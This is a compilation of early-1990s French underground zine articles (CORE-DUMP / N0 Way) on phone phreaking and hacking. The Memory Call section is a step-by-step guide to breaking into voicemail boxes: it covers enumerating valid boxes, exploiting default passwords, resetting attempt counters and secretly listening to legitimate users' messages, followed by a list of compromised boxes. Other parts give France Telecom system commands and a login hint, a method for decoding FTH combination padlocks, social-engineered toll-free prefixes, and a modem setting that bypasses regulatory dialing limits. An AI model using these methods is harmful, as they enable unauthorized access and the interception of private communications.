=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
= CORE-DUMP | Volume I | Issue 2 | Phile 2 | [NeurAlien] 28/05/92 =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
<--==*==-->---------------------------------<--==*==-->
<--==*==--> FT's Operating System <--==*==-->
<--==*==--> for <--==*==-->
<--==*==--> Cellular Telephone Managing <--==*==-->
<--==*==--> By NeurAlien <--==*==-->
<--==*==-->---------------------------------<--==*==-->
Intro:
-----
J'ai rassemblé ici tout ce que je savais sur le systàme de gestion
du téléphone cellulaire par France Telecom.
Je ne connais pas du tout ce systeme etant donne que je ne travaille pas
a France Telecom ;)
Si un jour vous tombez sur un systeme comme ca, faites moi une H-Phile
pour CORE-DUMP en expliquant le fonctionnement complet du systeme.
Et vive la libre circulation de l'information.
Organisation du R2000:
---------------------
Le R2000 (RADIOCOM 2000) est le téléphone cellulaire analogique Francais
fait par France Telecom.
Les frequences de transmission sont de 400 MHz à 440 MHz. Elles sont
organisees en BdF (Bandes de frequences???).
Ce sont des NRL (Relai) qui, connectés à des centres FT avec opérateurs grÉce
à des modems 300 bauds, gerent la transmission des informations de routage
et de taxation.
Aux UGR (lien avec le RTC), il y a des CGM qui gärent les mobiles et leur
routage.
Matériel:
--------
o Partie telecommunication, FT utilise les matériels suivants:
MATRACOM 6500 (et par celui ci, du x25 sémaphore)
MT25 (autocomm)
E10 (autocomm)
o Partie gestion informatique:
BULL
C'est sur ce dernier point que je vais m'attarder.
Apparemment, FT utilise des Bull DPS en reseau x25 et avec des modems
branchés sur le RTC (pour la relation avec les NRL).
Ils utilisent donc certainnement le systàme d'exploitation GECOS de Bull
mais aussi un logiciel de MATRA (CGM) pour la gestion donc des taxes et de
l'activité reseau.
Il est possible que le nom CGM provienne de Centre de Gestion des Mobiles.
il en est à sa version 8.5.
Logiciel MATRA:
--------------
Je vous met ici une liste de commandes qui devraient normalement marcher
sur le logiciel de MATRA (CGM). Certainnes n'ont aucune explication donc il
vaudrait mieux demander de l'aide en ligne la dessus.
Commandes:
TTA:BAN= : archivage des taxes.
CHANDI : transfert de fichier
AAE : Commande d'édition de l'anneau des alarmes
STE:NGR=1+8+7+6+12,PER= : édition des statistiques
TYC=MIC : service FTB
LMR : Liste de tous les mobiles créés sur le relai
CDE FTE : Commande d'édition des fichiers temporaires
FSM 001 FSM 0XX XX : édition des fichiers sur bandes selon les
mois (XX XX)
FSM 001 FSH 0YY YY : meme chose selon les semaines (YY YY)
ABS <numero d'UGR> : sauvegarde de tous ses fichiers.
LST : redémarre l'UTME + arret de liaison
+présaturation FSM
MOR : mise en suivi de mobiles
MOP : Idem
RSR : Rapatriement de fichier de suivi de mobile
CAI : commande de listage
LSU : statistiques
SUE : pour rapatrier un fichier FSE
CSR : Création de station radio
CQP : création de voie banalisée
LEU : donne l'etat des chaines
ECE : édition
Commandes sans explication:
VE
PERFID
LMS
DIR,VE
LAR
LGR
PEP
RHM LMA/LMF=....
RHM "LAR"
RHM LEU
FJA
LDI
BTR
LQR
AUE
LTL
CNX
Fichiers utilisés par le logiciel Matra (CGM):
CRAA
CRI
CRAD
FER
FTJ
TAX
FTYPUT
TOTAL
OOCRAA
NBBL
LPI
ABO
CAD
FICBDF
FSE : Fichier de stat
Systeme GECOS:
-------------
Pour se logger on tape L <compte en majuscule>
Sur les systems FT, il faut taper:
L SYSTEM
Il y a aussi generalement sur les systemes FT le programme ORACLE.
Et il semblerait que les fichiers du logiciel MATRA (CGM) soient compatibles
ORACLE.
Le mot de la fin:
----------------
Eh bien, j'espäre que ca vous permettra de pas vous retrouver bàte devant
le prompt de ce systeme si jamais vous y arrivez un jour...
En tout cas, j'espäre pouvoir vous donner plus d'info sur le GECOS d'ici
quelques temps...
Have Phun! ++ NeurAlien
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
The B.S.:
Cet article est purement informatif et n'incite en aucun cas a un quelconque
acte interdit. L'auteur ne pourra etre tenu pour responsable de toute
mauvaise utilisation de cet article.
Les informations de cet article sont publiques et ne peuvent en aucun cas
constituer un motif pour une quelconque action en justice contre son auteur.
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
-%!% N0 Way %!%-
Volume I, Numéro 2, Partie 2.8
#####################################
#####################################
## ##
## ##
## VMB's sur Memory Call ##
## ##
## (05.90.31.07.) ##
## ##
#####################################
#####################################
Et voila, la liste des BALs sur Memory Call!
Enjoy inter-continental phreaking! :)
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+-+ +-+
+-+ Another Phile By +-+
+-+ +-+
+-+ --==<< CrAzY tOnE >>==-- +-+
+-+ +-+
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
For eventual US readers: This is a list of VMB's on the
Memory Call Service, I don't know
it's number in US, but to reach it
from France, you have to dial the
toll free 05.90.31.07.
Bon, le numero, comme on le sait deja, est 05.90.31.07.
^^^^^^^^^^^^
Kelkes indications pour se connecter:
1) Ceci est un VMS (Vocal Mail Service) donc, rien ne sert de
l'appeller par modem. Appellez-le de chez vous, ou plutot
faites comme moi, callez de la cabine telefonik, c'est
moins dangeureux, du moment qu'il y a poa besoin de modem
pourquoi risquer d'etre trace?
2) Il faut appeller EN DEHORS des heures d'ouverture des bureaux
a savoir entre 9 a.m. et 5 p.m. en USA, donc en France avant
14 heures ou apres 00 heures (a peu pres) ou le week-end, kan
c'est ouvert 24/24.
3) Si vous tombez sur un operateur (trice) - raccrochez, pour ne
pas attirer de soupcons inutiles.
Donc, une fois que c'est un REPONDEUR ki vous repond, c'est bon,
vous pouvez y aller.
4) Le repondeur decroche au bout de 5 sonneries d'habitude.
5) Une fois que vous entendez le repondeur, il doit vous dire
'Leave us a message after the tone' ou kelke choz dans le
style. Appuyez une fois sur ETOILE (*), il demande:
- 'Please dial the number of the person you wish to call'
> Si vous voulez deposer un message a kelkun, faites:
22 + le numero de la BAL du destinataire puis suivez
les indications. (Il doit surement exister d'autres
moyens de deposer un msg, mais j'ai pas vraiment
cherche...)
> Si vous voulez acceder a votre BAL, faites:
(#) ou (*) puis entrez le numero de votre BAL et puis
le mot de passe suivi de (#)
Attention, au bout de 3 tentatives sans succes d'entree
du numero de la BAL successives, il vous deconnecte...
Meme choz pour le code. Mais le systeme etant tres con,
le compteur des tentatives est remis a zero a chaque fois
que vous entendez 'Welcome to Memory Call Service' (on
verra ca plus loin), donc on peut hacker sans rappeller
toutes les 30 secondes!
6) Si vous n'avez poa de VMB, allez voir directement le point 8,
sinon, lisez la suite.
7) Une fois que vous etes dans votre BAL, vous pouvez faire un
certain nombre de choses, dependant du type de votre VMB
(1) ou (2), (2) etant bien plus evolue. Mais en gros,
vous pouvez changer le mot de passe, enregistrer votre nom,
enregistrer vos greetings (msg d'accueil) lire les messages
et envoyer des messages (si type (2), sinon fo envoyer comme
c'est explique en 5)). Allez lire le point 9 directement.
8) Bon, vous avez poa de BAL...snif... le premiere solution est
d'en demander une a kelkun ki en a plusieurs, au moment ou
j'ecris ces lignes, les personnes succeptibles d'avoir des
BALs a refiler sont COOLHP et moi, qu'on peu joindre soit
sur Memory Call en 2613631 soit sur Likid en 5100. En ce
qui concerne COOLHP, je sais poa si il voudra refiler des
BALs, alors bon je donne kan meme son num sur Memory Call:
2654549. Bon, si personne ne vous donne de BAL, allez lire
le point 9, koike meme si on vous en donne une, allez le lire.
9) ** How to hack Memory Call **
Bon, hacker ce truk c'est poa bien compike, la preuve:
j'ai hacke une 20-aine de Bals de types (1) et (2) a ma
premiere connexion. Le truk le plus dur consiste a trouver
une BAL valable. Le mot de passe est le numero de la BAL
si cette BAL n'est pas encore occupee, mais deja assignee.
Parfois, j'ai trouve des pass des BALs occupees en essayant
des truks o pif, mais c'est poa tres souvent, alors si vous
ne trovez le mot de passe d'une bal du premier coup, laissez
beton, car vous serez obliges de rappeller tout les 3 movais
mots de passe, il est plus rapide de se trouvez une autre
BAL avec un mot de passe bidon.
Les BALs sont codes sur 7 chiffres allant de 0 a 9,
toutefois, il n'y a pas de BALs inferieures a 222-2222 au moment
ou j'ecris ca, d'ailleurs toutes les infos contenus dans ce
fichier ne sont valables a coup sur que pendant une certaine
periode apres l'ecriture, chez poa kelkes semaines ou kelkes
mois, aucune idee en fait.
Ainsi, la BAL la plus grande est 999-9999, bien k'elle
ne soit pas assignee pour l'instant.
Comme je l'avais dit, le systeme est tres con, a savoir,
il vous dit, kan vous entrez votre num de BAL (pas de code!)
il vous dit kan vous faites une erreur!!! ce qui rend _facile_
de trouver les nums de BALs valables. Toutesfois, il ne le dit
qu'apres que vous ayez entres 3 chiffres, ou ayez entendu trop
longtemps sans rien entrer. Exemple:
(BAL valable: 261-3631)
J'entre 260.
Il me dit rien kan j'entre le '2', ni kan j'entre le '6'
mais kan j'entre le '0' a la fin, il me dit 'not recognized'
car il n'y a donc aucune BAL qui commence par 260.
Bon, j'entre donc 261. il ne dit rien, car attend les chiffres
restant, car il existe une ou plusieurs BALs qui commencent
par 261.
J'entre donc 0, il me dit 'non recognized', car il n'y a
aucune bal qui commence par 2610, par contre il y'en a une
qui commence par 2613, donc kan j'entrerai 2611, il me dira
non, 2612 non plus, 2613 il dira rien kar attendra d'autre
chiffre... voila... et c'est pareil pour les quatres chiffres
qui suivent le num du groupe. (num du groupe = 3 premieres
chiffres du num de la BAL, voir plus loin).
Bon, il se trouve qu'il y a un certain nombre de BALs qui
sont deja assignes, mais pas visites par kikonk, donc il
contiennent le 'temporary password', a savoir le numero de
la BAL!!!!!!! Ils le font expres!!! Ils sont con!!!!!
Bon, bin vous entrez donc le temporary password, si il dit
'Thank-you' c'est que c'est bon, vous entrez le pass que
vous voulez installer, votre nom, greetings, et hop, une BAL
toute fraiche pour vous.
Alors, la est l'interessant, si il vous dit en denombrant
les options disponibles "Send a Message" c'est que vous avez
une BAL de type (2), vous avez toutes raisons d'etre contents.
La BAL de type (2) vous permet de reconnecter en appuyant sur
(5) dans le MAIN MENU. Et donc reinitialiser le compteur des
tentatives sans succes!!!
Pour hacker sans rappeller:
- hacker une BAL de type (2);
- scanner les bals en consultant a chaque 2eme
tentative sans succes votre BAL de type (2) et
en se reconnectant en appuyant sur (5);
Voila...
10) Alors, pour les groupes... Il se trouve que les BALs sont
souvent groupees, en ayant en commun les 3 premieres chiffres
du num de BAL, donc si vous trouvez un num de group (les 3
premieres chiffres) valide, scannez le a mort, il vous
rapportera peut-etre, si on l'a poa deja scanne :) plein de
BALs.
11) Si vous trouvez un mot de passe d'une bal utilisee par kelkun,
ne le changez surtout pas, car:
- Si c'est un occupant legitime, il va le dire a
l'operateur, et vous perdrez la BAL definitivement;
- Si par contre, vous changez poa le code, vous pourrez
vous amuser a ecouter ses messages sans qu'il s'en
apercoive, car les messages ne sont pas markes lus!
Si jamais vous trouvez le mot de passe de l'operateur, dont
la BAL est 9995555, ne foutez rien en l'air, allez partout,
mais n'effacez rien, ne modifiez pas trop, sinon il va s'en
remarker et finito el passwordo...
Les mots de pass courants:
- le num de la BAL
- 12345
- 123456
Et n'importe quoi qui vous passe par l'esprit...
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Bon allez, now c'est la liste des Bals...
**************
** LEGENDES **
**************
(1) Type 1
(2) Type 2
(!) Un hacker qui l'occupe (francais ou US...)
(+) Occupant legitime, mais on connait le pass hehehe
(-) Occupant legitime, mais on connait poa le pass bouhooOOooOOoo
(*) Operateur! C'est en fait une femme...
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
(-) 222-2222
(!1) 225-2657 Ma BAL de secours!
(!1) 242-9552 TraXX
(-) 252-9591
(-) 260-1225
(!2) 261-3631 Une BAL a moa
(-) 262-1124 Une certaine Marylin
(!1) 265-4549 COOLHP
(-) 268-2110
(!2) 279-1721 Encore a MoAaAaAaA
(-) 281-1897
(-) 282-1608
(-) 287-1123 Transaction NetWork
(-) 291-0521
>> (+1) 291-0603
(-) 291-0746
(-) 291-0851
(-) 291-0969
(!1) 291-0977 Eh oui! encore a moi...
(-) 291-0999
(!2) 291-1252 Toujours a moi
(-) 291-1325
(-) 291-1585
(-) 291-1624
(+1) 291-1670
(-) 291-1713
(!1) 291-1825 A moi
(!1) 291-2005 Zarbi: 8 messages kan je l'ai ouverte...
(+1) 291-2040 On peut ecouter leurs msg!
(-) 292-1113 Yougada Technologies
(-) 296-1111
(!2) 321-5235 Je suis passe aussi par la...
(!1) 329-9797 Jedi
(!1) 353-9015 Rebel-94
(!1) 356-5314 Hpreg
(!1) 363-0053 Thesee
(-) 367-8812
(!1) 388-4356 A moi
(!1) 396-2082 Idem
(-) 443-6111 Yougada NetWork
(!2) 444-4411 A moi
(-) 448-1112 Cathy
(-) 471-0393 George
(!1) 491-8845 A moi
(?) 523-2 Seulement 4 digits !!!????!!!!
(!1) 555-5555 A moi...
(<-><!>) 587-7500 C'est ptet' un hacker? USA? autre?
(-) 636-5664 Isabella
(!1) 645-9117 A moi
(!1) 695-4490 Pareil...
(-?) 696-8832 Alex Thompson. EN FRANCAIS!! Hacker?
(!2) 886-0052 COOLHP
(?) 886-0803
(?) 886-0509
(?) 886-0322 COOLHP
-%!% N0 Way %!%-
Volume I, Numéro 2, Partie 2.9
Cet article est un article de CORE-DUMP, journal Underground Hacker jamais
diffuse publiquement.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
= CORE-DUMP | Volume I | Issue 2 | Phile 7 | [NeurAlien] 05/05/92 =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
____________
/ __________ \
/ / \ \
| | | |
| | | |
__|_|___________|_|__
| o F T H o |
| ___ ___ ___ ___ |
| [1] [3] [9] [7] |]]
| [2] [4] [0] [8] |]]
| [3] [5] [1] [9] |]]
| [4] [6] [2] [0] |]]
|____________________|
UN-lock the FTH numerical Lock
Par NeurAlien
Intro:
En lisant les nouveaux Phracks ou le "2600 magazine" exposait ses
dernieres passes (ils avaient reussi a trouver une methode pour ouvrir
en trouvant le code des serrures SIMPLEX qui equipent toutes les boites
"FEDERAL EXPRESS"... Bravo a eux... (au fait, je ne sais toujours pas
comment ils font...)), eh bien je me suis dit:
"Pourquoi moi je ne pourrais pas trouver aussi une methode pour ouvrir
les cadenas a codes???"
Le soir meme (c'est a dire aujourd'hui...), je me suis precipite apres
les cours dans une quincaillerie et apres une petite dose de "Social
Engineering", je me suis procure un cadenas a code numerique (je n'ai
pas dit digital...) de chez FTH.
Vous pouvez trouver ce cadenas n'importe ou a mon avis. Je ne sais
pas en tout cas s'il est frequemment utilise.
Bref, au bout d'une bonne demi-heure pendant lesquelles j'ai regarde
comment le cadenas fonctionnait, j'ai trouve un moyen pour trouver le
code.
Et le VOICI :
Principe de ce cadenas:
----------------------
Il est consitue de 12 parties qui nous interressent:
- un anneau de securite qui est (generalement) sur tous les cadenas ;)
- un cliquet qui permet au pene de se retirer du cadenas quand
on a le code et que l'on veut changer ce dernier ou voir les bagues.
- 4 "viroles" c'est a dire, les quatres annaux en metal jaune qui tournent
et qui permettent de positionner le code (numrotes de 0 a 9).
Ce sont juste des roues dentees creuses pour recevoir les bagues.
Elles sont logees dans le cadenas en lui meme dans les logements prevus
a cet effet.
- 4 bagues situees a l'interieur des viroles (ce sont elles qui composent
la cle, le code.
(il faut pour les voir:
1/ mettre le bon code en face de la barre horizontale du cote du cadenas
ou il y a inscrit "FTH"
2/ tirer sur le pene quand il y a le bon code
3/ lever le cliquet
4/ enlever totalement le pene du cadenas
5/ enlever une des viroles, elle est composee de deux parties, la virole
en elle meme qui est l'anneau le plus grand et la bague qui est
l'anneau le plus petit (le pene passant au milieu de ce dernier).
- un pene (prononcer PAINE, il y a un accent grave) qui sert a ouvrir ou a
bloquer le cadenas.
Il est situe sur la partie droite du cadenas et a cette forme quand il
est retire du cadenas:
_____
|__ | <-- partie bloquant
| | l'anneau de
___ ___ ___ | | securite
__/|___| |___| |___| |____| |
(__________________________ |
| |
|_|
\___________ ___________/
\/
Partie qui est normalement
dans le cadenas. C'est la
partie qui bloque les
viroles.
- Le cadre du candenas (le cadenas).
H2U : How To Unlock:
-------------------
Eh bien c'est simple: il faut trouver le code...
(J'imagine ce que vous vous dites dans votre tete: haha, marrant celui la,
on a pas 3 ans pour essayer les 10 000 combinaisons.)
Bon, eh bien, pour trouver ce code, j'ai decouvert un petit truc marrant:
A la fabrication, ils ne sont pas surs au millimetre pres que le pene
rentre dans le trou du cadenas. Donc ils donnent des dimensions
legerement inferieures au pene par rapport au modele initial ce qui donne
un peu de jeu au pene. Ainsi, on peut faire bouger le pene.
Deja, prenons le cadenas dans la bonne position: mettez le de telle
maniere pour pouvoir lire FTH verticalement sur la gauche et le pene en
haut du cadenas. (cad, anneau de securite sur la gauche).
D'autre part, pendant toute l'operation, il ne faut que aucun poids ne pese
sur l'anneau de securite (ex: ce qui est attache).
Le cadenas DOIT ETRE V E R T I C A L !
Donc, il ne faut absolument pas maintenir le cadenas dans la bonne position
en le tenant par l'anneau de securite.
Ensuite, il faut avoir une source de lumire vive pour cette operation
(une lampe de poche large, le soleil, une ampoule forte).
On placera cette derniere dans la bonne position derriere le cadenas de telle
sorte que l'on voit des fentes de lumiäre au dessus des viroles \/.
Juste au dessus de chaque partie dentelee de chaque virole, on doit voir
une fente de lumiere meme si l'espace est tres petit (cela est primordial
donc une bonne vue est necessaire.)
Si on essaye de soulever un peu le pene (utiliser un chewing gum par exemple
pour une meilleure prehension), on va voir la partie centrale de la raie de
lumiere s'obscurcir. Si cela se produit, c'est que le numero de la virole
place pour le code n'est pas le bon !!!
Sinon, la raie de lumiere reste la meme... et alors la, le code de
la virole concernee est bon.
Il faut essayer plusieurs fois pour bien en etre sur !
Donc, la bonne methode est de faire ca en mettant successivement comme code
0000, 1111, 2222, 3333, 4444, 5555, 6666, 7777, 8888, 9999.
Une fois qu'on a trouve sur une virole un bon chiffre, on le laisse tel quel,
et on continue de chercher avec les autres viroles.
Et au bout du compte, BINGO... Vous avez ouvert le cadenas !
Si vous n'y arrivez pas la premiere fois, reessayez, c'est dur au debut de
bien voir quand la raie de lumiere s'obscurcit !!!
Explication:
-----------
Le pene ayant toujours du jeu vertical, on peut le faire bouger donc on
fait bouger (se deplacer vers le haut de facon plus precise) les excroissance
sur le pene lorsque l'on souleve puis rabaisse ce dernier.
Ainsi, si ces excroissances sont en face de l'encoche de la bague a
l'interieur de la virole (c'est a dir que le chiffre sur cette roue est
le bon), la bague ne se souleve pas quand on souleve le pene et ainsi la
raie de lumiere reste pareille.
Par contre, si ce n'est pas le bon chiffre, la bague est remontee par les
excroissance et ainsi obscurcit tout ou partie du milieu de la raie de
lumiere.
Alors maintenant, Go 4 it!
++NeurAlien.
The Bull-Shit:
Ce texte et tout ce qui pourrait en decouler ne pourront etre retenus
contre moi. Ce n'est que de l'information pure et donc non sanctionnable.
FTH est (certainnement) une marque deposee.
PS from '94: And if you don't wot a pene is, get a life ! ;)) haha
-%!% N0 Way %!%-
Volume I, Numéro 2, Partie 2.10
Cet article est un article de CORE-DUMP, journal Underground Hacker jamais
diffuse publiquement.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
= CORE-DUMP | Volume I | Issue 2 | Phile 5 | [NeurAlien] 14/05/92 =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
*--*--*--*--*--*--*--*--*--*--*
| |
| International Toll Free |
* *
| Phone Numbers In France |
| |
* By *
| NeurAlien |
| |
*--*--*--*--*--*--*--*--*--*--*
Intro:
Alors voila, France TELECOM est tres tres gentille...
Je leur ai demande des infos, et hop, thanx 2 social engineering, me voila
en possession de ces infos qu'ils ne veulent pas trop distribuer...
LIBERTE D'INFORMATION, Merci...
B.S.: Ces informations m'ayant ete donnees par un technicien de France
Telecom, je ne pourrais etre en aucun cas poursuivi par France Telecom;
Ces informations etant dans certainnes documentations PUBLIQUE mais
rarement distribuees de France TELECOM. Je ne pourrais etre tenu comme
responsable d'un acte ou fait consecutif a la lecture de cet article.
Cet Phile vous presente ce qu'est le numero vert International (toll free
number) et ses acces indoor ou outdoor (cad en france et ailleurs).
>Le principe:
Un numero vert est en fait un numero dans une liste de numeros au central
de votre coin. Cette liste contient:
le numero vert, le numero normal correspondant et la zone d'influence plus
quelques autres informations je suppose.
Quand on decroche le telephone et que l'on compose un numero vert, le central
doit aller verifier que ce numero existe dans sa liste, marque la
communication comme non-payante pour l'appelant, verifie que l'appelant est
la zone d'influence du numero vert (cad que l'utilisateur a le droit d'y
acceder du point geographique d'ou il appelle) et appelle le numero
correspondant dans sa liste.
Pour le numero vert, c'est la meme chose sauf que c'est vers l'etranger que
la communication est orientee. (c.a.d que le numero normal correspondant
au numero vert international est a l'etranger.)
>Forme du numero vert international en indoor:
Le numero vert international commence toujours par 0590 puis un indicatif du
pays puis l'adresse propre a l'abonne au numero vert international situe a
l'etranger.
Dans beaucoup d'autres pays il existe des liens telephoniques 'toll free
numbers' vers la France.
>Les indicatifs indoor:
Je ne les ais pas tous mais j'ai reussi a recuperer les principaux.
Les 'x' dans la liste sont le nombre de digits qui doivent suivre l'indicatif.
N'oubliez pas qu'un numero vert est toujours compose de 8 chiffres comme tous
les numeros telephoniques de France.
------------------------------------------------------------------------------
Pays: Indicatif Commentaire
------------------------:-----------------------:-----------------------------
Allemagne : 05 90 4x xx :
Belgique : 05 90 7c xx :c=tout sauf 3
Danemark : 05 90 52 xx :
Espagne : 05 90 3c xx :c=tout sauf 4
Finlande : 05 90 55 xx :
Hong Kong : 05 90 94 xx :
Italie : 05 90 04 xx :
Japon : 05 90 9c xx :c=tout sauf 4
Luxembourg : 05 90 69 xx :
Netherlands/Pays Bas : 05 90 6c xx :c=0..8
Norvege : 05 90 57 xx :
Portugal : 05 90 73 xx :
Suede : 05 90 34 xx :
Suisse : 05 90 8x xx : meme indicatif que l'UK
UK : 05 90 8x xx : meme indicatif que la Suisse
USA AT&T : 05 90 1x xx : AT&T
: 05 90 21 xx : AT&T
: 05 90 23 xx : AT&T
: 05 90 25 xx : AT&T
USA MCI : 05 90 27 xx : MCI
: 05 90 28 xx : MCI
: 05 90 29 xx : MCI (npa=216)
USA Sprint : 05 90 02 xx : Sprint
Pour les USA, on ne sais pas trop dans quel état/ville/companie on tombe.
Mais certainnes fois, on recoit un message a la place d'une quelconque
sonnerie: "2 1 6, Sorry, the number you've dialed is not in service, please,
check your number and dial again. Otherwise, try to reach a MCI
Operator."
Dans ce message vous apprenez que la serie dans laquelle se situe votre
numero appele est dans l'etat/l'area code de NPA 216 et que la compagnie
qui gere la communication est MCI.
Pour la liste des NPA, voyez une autre H/P-Phile.
Si vous en avez d'autre, dites le moi.
>Toll Free Numbers Outdoor:
Ce sont des numeros verts dans certains pays pour appeler vers la France.
------------------------------------------------------------------------------
Pays: Indicatif Commentaire
------------------------:-----------------------:-----------------------------
Allemagne (DE) : 0130 81 xxxx : Anciennement RFA
Australie (AU) : 0014 800 125 xxx :
Belgique : 11 xxxx :
Canada (CA) : 1 800 x 6343 xx :
Danemark (DK) : 80010 xxx :
Espagne (SP) : 900 9x 33 xx :
Etats Unis (US) : 1 800 xxx xxxx : (alors la, c'est epars...)
Finlande (FI) : 9 800 133 xx :
Hong-Kong (HK) : 800 33 xx :
Hongrie : 00 800 xxxxx :
Irlande : 1 800 55 xxxx :
Italie (IT) : 1 678 xxxxx :
Japon (JP) : 00 31 33 xxxx :
Japon (JP) : 00 44 22 33 xxxx :
Luxembourg : 0 800 xxxx :
Norvege (NO) : 06 022 xxxx :
Portugal : 05 05 33 xxx :
Royaume-Uni (UK) : 0 800 89 xxxx :
Singapour : 800 xxxx :
Suede : 020 795 xxx :
Suisse : 1 55 xxxx :
Note sur les toll free numbers:
Apparemment, la cause du changement de la signalisation en DTMF inter-centraux
qui permettait a l'origine l'utilisation de la blue boxe serait due a des
Hackers et des Phone Phreak qui auraient utilise les Toll free numbers pour
arriver gratuitement sur le reseau francais.
ThE EnD:
-------
Eh bien, j'espere que vous avez un bon accent et de bonnes connaissances
en langues etrangeres.
Notez que les numeros de cette derniere liste de pays sont uniquement
accessibles en etant interne au pays (sauf si vous avez un PABX dans
le pays designe).
Quand aux sigles entre parenthese, c'est conforme a l'ISO xxxx (vous voulez
vraiment le xxxx ;) ???), ou si vous preferez les domains d'internet.
>Les coordonnees du centre qui s'occupe de cela:
DIRECTION DES RESEAUX EXTERIEURS
246 RUE DE BERCY
75584 PARIS CEDEX 12
Tel: 05 19 33 33
(ps: 05 19 xx xx ce sont tous les services de la DTRE, Direction des
Telecommunications des Reseaux Exterieurs.)
Mais n'allez pas leur demander comme ca en etant un particulier:
quel est l'indicatif numero vert international pour Taiwan ou pour la Coree
du Sud (si vous avez ces 2 derniers en tt cas, ca m'interresse...).
Vous vous feriez jeter. Bon social-engineering.
Informativement votre, ++NeurAlien
-%!% N0 Way %!%-
Volume I, Numéro 2, Partie 2.11
%=%-%=%-%=%-%=%-%=%-%=%-%=%-%=%
%=%- Telecom Information %=%
%=%- Par %=%
%=%- NeurAlien %=%
%=%-%=%-%=%-%=%-%=%-%=%-%=%-%=%
>>>>>Informations générales et diverses sur le téléphone, les modems etc...<<<<
> Modem & restrictions:
--------------------
Vous savez, France Telecom est une sale société de rats puants. Vous savez
aussi qu'ils veulent limiter la technologie à leur propre usage.
Un exemple, l'agrémentation des appareils téléphoniques se fait uniquement
si cet appareil n'est pas trop performant.
Apparemment, les modems USR étaient trop performant (ainsi que la pluspart des
modems). Ils composaient träs vite, pouvait rappeler immédiatement un
numéro et plein d'autres petites fonctionnalités de ce type existaient.
FT a vu la dedans une menace envers son monopole et hop, pour àtre
agréé il faut intégrer une periode d'attente entre la composition de
2 numéros et aussi comporter une blacklist qui bloque un numéro si celui ci
est rappelé sans succes trop souvent.
N0 WAY vous fournit des aujourd'hui un moyen de bypasser cette
protection!
Connectez vous à votre modem et tapez:
atz
at s40=2
at &w (pour sauvegarder)
Et voila, maintenant vous enculez en profondeur FT !!!! hahahaha...
(teste et approuve sur USR Courrier Terbo V32Bis)
Je ne sais pas si les mecs de USR sont au courant de ca mais c'est träs bon.
Il est träs interressant de bidouiller son modem avec les "reserved" register.
Je donne la liste des ces registers ou des bits reservé de certains registres:
- S13 : Registre batard pour faire des actions au startup etc...
le bit 128 de ce registre est "Custom Application Only"
Doc Default: 0 French Default: 0
- S14 : Dans la série des registres de parametrage de mode, on
peut imaginer que ce registre sert à la màme chose.
le registre entier est reservé.
Doc Default: 0 French Default: 0
- S15 : Paramétrage des modes du modem.
le bit 128 de ce registre est "Custom Application Only"
Doc Default: 0 French Default: 0
- S16 : Paramàtre pour tester son modem: Dial test, Loopback...
les bits 4 (16), 5(32) et 6(64) de ce registre sont reservés.
le bit 7 (128) est carrement pas liste.
Doc Default: 0 French Default: 0
- S17 : Toujours dans la série des bits de test, ca doit àtre ca!
le registre entier est reservé.
Doc Default: 0 French Default: 0
- S20 : Dans la série des registres utilisés comme timer, ca
doit àtre la màme chose.
le registre entier est réservé.
Doc Default: 0 French Default: 0
- S25 : Dans la série des registres utilisés comme timer, ca
doit àtre la màme chose.
le registre entier est réservé.
Doc Default: 0 French Default: 5
- S27 : Registre qui permet d'activer/desactiver des vitesses et des
modes.
le bit 6 (64) est réservé.
Doc Default: 0 French Default: 1
- S30 : Registre NON LISTE !
Dans la série des modes / avant le registre de détermination
de l'action d'appui sur VOICE/DATA.
French Default: 0
- S31 : Registre NON LISTE !
Dans la série des modes / avant le registre de détermination
de l'action d'appui sur VOICE/DATA.
French Default: 0
- S33 : Les bits de 1 à 7 (valeurs 2 à 128) ne sont pas listés dans
la doc.
Le bit 1 sert a activer le mode HST cellular.
Doc Default: 0 French Default: 0
- S35 : Non listé French Default: 0
- S36 : Non listé French Default: 0
- S37 : Non listé French Default: 0
- S39 : Non listé French Default: 11
- S40 : Non listé French Default: 0
Sert entre autre a bypasser les limitations FT !
- S45 : Non listé (dans la série des timings)
French Default: 0
- S46 : Non listé (dans la série des timings)
French Default: 0
- S47 : Non listé (dans la série des timings)
French Default: 0
- S48 : Non listé (dans la série des timings)
French Default: 0
- S49 : Non listé (dans la série des timings)
French Default: 0
- S50 : Non listé (dans la série des timings)
French Default: 0
- S51 : Sert a mettre en route ou disabler les modes MNP/V42 bis
Les bits de 3 à 7 (valeurs 8 à 128) sont réservés.
French Default: 0
- S52 : Réservé French Default: 0
- S53 : Les bits de 3 à 7 (valeurs 8 à 128) ne sont pas listés.
French Default: 0
Amusez vous à les bidouiller et vous aurez des resultats époustouflants!
